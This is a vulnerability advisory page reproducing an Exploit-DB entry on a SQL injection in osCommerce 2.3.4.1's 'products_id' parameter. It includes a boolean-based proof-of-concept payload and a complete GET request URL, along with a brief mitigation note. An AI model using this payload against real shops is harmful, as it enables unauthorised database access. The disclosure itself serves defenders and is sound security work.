osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities

vendor:

osCommerce Online Merchant

by:

Mehmet EMIROGLU

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: osCommerce Online Merchant

Affected Version From: 2.3.4.1

Affected Version To: 2.3.4.1

Patch Exists: NO

Related CWE:

CPE: a:oscommerce:oscommerce:2.3.4.1

Metasploit:

Other Scripts:

Platforms Tested: Windows

2019

osCommerce 2.3.4.1 – ‘products_id’ SQL Vulnerabilities

The osCommerce 2.3.4.1 version web application is vulnerable to SQL injection. By replacing the 'products_id' value in the URL with a high number and adding a specific payload, an attacker can execute arbitrary SQL queries.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, it is recommended to implement input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

####################################################################

# Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities
# Dork: N/A
# Date: 05-02-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://www.oscommerce.com
# Software Link: https://www.oscommerce.com/Products
# Version: 2.3.4.1
# Category: Webapps
# Tested on: Wampp @Win
# CVE: N/A
# Software Description: osCommerce Online Merchant is a complete online
store solution
  that contains both a shop frontend and an administration backend
  which can be easily configured and customized with over 8,855 free
add-ons.

####################################################################

# Vulnerabilities / Impact
# This web application called as osCommerce 2.3.4.1 version.
# Switch to the product_info tab. Replace the ID value in the url, with a
high number value.
  for example product_info.php?products_id=1 change to 9999999
  then add the payload at Attack_pattern to the end of the url.

####################################################################

# POC - SQL (Boolean Based)
# Parameters : products_id
# Attack Pattern : oR 1811160=1811160 aNd 7193=7193
# GET Request :
http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
oR 1811160=1811160 aNd 7193=7193

####################################################################